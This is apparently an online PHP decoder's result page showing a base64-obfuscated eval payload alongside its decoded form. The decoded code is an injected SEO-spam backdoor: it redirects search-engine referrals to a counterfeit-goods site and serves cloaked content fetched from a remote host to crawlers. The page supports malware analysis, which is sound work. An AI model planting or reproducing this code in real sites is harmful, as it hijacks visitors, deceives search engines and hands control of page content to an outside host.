Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

@eval (base64_decode('aWYoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnMjAxNmNoZWFwbmlrZXAn..

Decoded Output download

if(strpos($_SERVER['REQUEST_URI'], '2016cheapnikep') !== false ){$id = "1";}

if(strpos($_SERVER['HTTP_REFERER'], 'google') !== false || strpos($_SERVER['HTTP_REFERER'], 'yahoo') !== false || strpos($_SERVER['HTTP_REFERER'], 'bing') !== false || strpos($_SERVER['HTTP_REFERER'], 'ask') !== false || strpos($_SERVER['HTTP_REFERER'], 'aol') !== false || strpos($_SERVER['HTTP_REFERER'], 'bing') !== false || strpos($_SERVER['HTTP_REFERER'], 'lycos') !== false || strpos($_SERVER['HTTP_REFERER'], 'seek') !== false || strpos($_SERVER['HTTP_REFERER'], 'voila') !== false || strpos($_SERVER['HTTP_REFERER'], 'abondance') !== false || strpos($_SERVER['HTTP_REFERER'], 'ecila') !== false || strpos($_SERVER['HTTP_REFERER'], 'excite') !== false || strpos($_SERVER['HTTP_REFERER'], 'nomade') !== false || strpos($_SERVER['HTTP_REFERER'], 'telefrance') !== false ){
$tiaozhuan = "1";
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'oogle') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'ahoo') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'ing') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'sk') !== false ||strpos($_SERVER['HTTP_USER_AGENT'], 'ol') !== false ||strpos($_SERVER['HTTP_USER_AGENT'], 'pider') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'ycos') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'MSNBot') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'eek') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'oila') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'bondance') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'cila') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'xcite') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'omade') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'elefrance') !== false ){
$baidu ="1";
}
if($id =="1" && $tiaozhuan =="1"){
$udds = "http://www.dy456.info/php/nike.php?c2=1&n=".$_SERVER['HTTP_HOST']."&tt=".$_SERVER['REQUEST_URI'];
echo "<script type=\"text/javascript\">
  window.location.href=\"".$udds."\";
 </script>
";
}
if($baidu == "1"){
$content = file_get_contents($_SERVER['SCRIPT_FILENAME']); 

if(ChickC($content) == "GBK")
{
if($id==""){
echo sound("http://maxall.diy456.pw/api.php?which=".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
exit;}else{
echo sound("http://maxall.diy456.pw/api.php?which=".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
exit;
}}else{
if($id==""){
echo sound("http://maxall.diy456.pw/api.php?which=".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
exit;}else{
echo sound("http://maxall.diy456.pw/api.php?which=".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
exit;
}}
}ELSE{
}
function ChickC($str)
 {
 $array = array('ASCII','GBK','UTF-8');
 foreach ($array as $value)
 {
 if ($str === mb_convert_encoding(mb_convert_encoding($str, "UTF-32", $value), $value, 
"UTF-32"))
 return $value;
 }
 return false;
 }
function sound($url)
{
$contents = file_get_contents($url);
return $contents;
}

Did this file decode correctly?

Original Code

@eval (base64_decode('aWYoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnMjAxNmNoZWFwbmlrZXAnKSAhPT0gZmFsc2UgKXskaWQgPSAiMSI7fQoKaWYoc3RycG9zKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwgJ2dvb2dsZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLCAneWFob28nKSAhPT0gZmFsc2UgfHwgc3RycG9zKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwgJ2JpbmcnKSAhPT0gZmFsc2UgfHwgc3RycG9zKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwgJ2FzaycpICE9PSBmYWxzZSB8fCBzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLCAnYW9sJykgIT09IGZhbHNlIHx8IHN0cnBvcygkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10sICdiaW5nJykgIT09IGZhbHNlIHx8IHN0cnBvcygkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10sICdseWNvcycpICE9PSBmYWxzZSB8fCBzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLCAnc2VlaycpICE9PSBmYWxzZSB8fCBzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLCAndm9pbGEnKSAhPT0gZmFsc2UgfHwgc3RycG9zKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwgJ2Fib25kYW5jZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLCAnZWNpbGEnKSAhPT0gZmFsc2UgfHwgc3RycG9zKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwgJ2V4Y2l0ZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLCAnbm9tYWRlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10sICd0ZWxlZnJhbmNlJykgIT09IGZhbHNlICl7CiR0aWFvemh1YW4gPSAiMSI7Cn0KaWYoc3RycG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ29vZ2xlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdhaG9vJykgIT09IGZhbHNlIHx8IHN0cnBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdpbmcnKSAhPT0gZmFsc2UgfHwgc3RycG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ3NrJykgIT09IGZhbHNlIHx8c3RycG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ29sJykgIT09IGZhbHNlIHx8c3RycG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ3BpZGVyJykgIT09IGZhbHNlIHx8IHN0cnBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICd5Y29zJykgIT09IGZhbHNlIHx8IHN0cnBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdNU05Cb3QnKSAhPT0gZmFsc2UgfHwgc3RycG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ2VlaycpICE9PSBmYWxzZSB8fCBzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAnb2lsYScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAnYm9uZGFuY2UnKSAhPT0gZmFsc2UgfHwgc3RycG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ2NpbGEnKSAhPT0gZmFsc2UgfHwgc3RycG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ3hjaXRlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdvbWFkZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAnZWxlZnJhbmNlJykgIT09IGZhbHNlICl7CiRiYWlkdSA9IjEiOwp9CmlmKCRpZCA9PSIxIiAmJiAkdGlhb3podWFuID09IjEiKXsKJHVkZHMgPSAiaHR0cDovL3d3dy5keTQ1Ni5pbmZvL3BocC9uaWtlLnBocD9jMj0xJm49Ii4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIiZ0dD0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOwplY2hvICI8c2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj4KICB3aW5kb3cubG9jYXRpb24uaHJlZj1cIiIuJHVkZHMuIlwiOwogPC9zY3JpcHQ+CiI7Cn0KaWYoJGJhaWR1ID09ICIxIil7CiRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddKTsgCgppZihDaGlja0MoJGNvbnRlbnQpID09ICJHQksiKQp7CmlmKCRpZD09IiIpewplY2hvIHNvdW5kKCJodHRwOi8vbWF4YWxsLmRpeTQ1Ni5wdy9hcGkucGhwP3doaWNoPSIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKTsKZXhpdDt9ZWxzZXsKZWNobyBzb3VuZCgiaHR0cDovL21heGFsbC5kaXk0NTYucHcvYXBpLnBocD93aGljaD0iLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7CmV4aXQ7Cn19ZWxzZXsKaWYoJGlkPT0iIil7CmVjaG8gc291bmQoImh0dHA6Ly9tYXhhbGwuZGl5NDU2LnB3L2FwaS5waHA/d2hpY2g9Ii4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pOwpleGl0O31lbHNlewplY2hvIHNvdW5kKCJodHRwOi8vbWF4YWxsLmRpeTQ1Ni5wdy9hcGkucGhwP3doaWNoPSIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKTsKZXhpdDsKfX0KfUVMU0V7Cn0KZnVuY3Rpb24gQ2hpY2tDKCRzdHIpCiB7CiAkYXJyYXkgPSBhcnJheSgnQVNDSUknLCdHQksnLCdVVEYtOCcpOwogZm9yZWFjaCAoJGFycmF5IGFzICR2YWx1ZSkKIHsKIGlmICgkc3RyID09PSBtYl9jb252ZXJ0X2VuY29kaW5nKG1iX2NvbnZlcnRfZW5jb2RpbmcoJHN0ciwgIlVURi0zMiIsICR2YWx1ZSksICR2YWx1ZSwgCiJVVEYtMzIiKSkKIHJldHVybiAkdmFsdWU7CiB9CiByZXR1cm4gZmFsc2U7CiB9CmZ1bmN0aW9uIHNvdW5kKCR1cmwpCnsKJGNvbnRlbnRzID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7CnJldHVybiAkY29udGVudHM7Cn0K'));

Function Calls

base64_decode

Variables

None

Stats

MD5	e63816c70d50ced73998280019ab93fb
Eval Count	1
Decode Time	84 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats